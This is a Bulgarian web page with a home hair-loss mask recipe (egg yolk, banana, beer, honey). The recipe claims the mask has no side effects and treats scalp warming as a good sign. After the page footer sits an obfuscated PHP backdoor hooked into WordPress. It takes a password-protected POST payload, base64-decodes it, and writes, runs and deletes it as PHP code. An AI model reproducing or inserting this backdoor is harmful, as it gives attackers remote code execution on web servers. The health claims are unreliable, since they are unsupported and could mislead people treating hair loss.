Рецепта с бира и банан спира косопада! Виж Тук: | Косопад

Рецепта с бира и банан спира косопада! Виж Тук:

kosa-maska

Косопадът е сериозен проблем и при мъжете, и при жените. Не винаги обаче е лесно да се установи точната причина, която го предизвиква. В такива случаи, е добре да се изпробват комбинации от различни вещества за по- мащабно въздействие.

Природна рецепта с много лесни съставки спира косопада и стимулира растежа на косата. Комбинацията е подходяща и за мъже, и за жени. Не съдържа токсини и няма никакви странични ефекти. При редовна употреба, резултатите бързо се появяват.

Съставки:

– 1 жълтък (суров)
– Половин банан
– 100 мл бира
– 1-2 лъжици мед

kosa-maska-1

Освен че съставките са съвсем достъпни, начинът на приготвяне е елементарен. Само трябва да си смесим и разбъркаме добре.

Нанася се върху засегнатите от косопада зони и се оставя да престои няколко часа. Ако усещате, че зоната се загрява, не се притеснявайте. Това е добър знак.

Маската се прави поне веднъж седмично.

Защо бананът е полезен за косата:
Много е подходящ за стимулиране растежа на косъма, тъй като е богат на витамини, калций, калий, въглехидрати. Прави косата блестяща и коприненомека. Става много еластична.

Полезни свойства на бирата за косата:
Съдържа ценният минерал силиций. Той придава обем на косата, прави я по- гъста. Подпомага растежа й, както и на ноктите. Бирата е една от най- полезните съставки за подсилване на косата.
Ако искате жизнена и силна коса, не пропускайте да включите тази домашна маска към режима й за поддръжка. Бирената мая е изключително полезна, тъй като съдържа голямо разнообразие от витамини от групата В.

Полезни свойства на меда за косата:

Богат е на витамини и минерали, които са много ценни за косата. Медът подхранва косата, хидратира я, прави я мека и блестяща. Много е полезен при изтощена коса.

02. август 2017 12:32:02 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}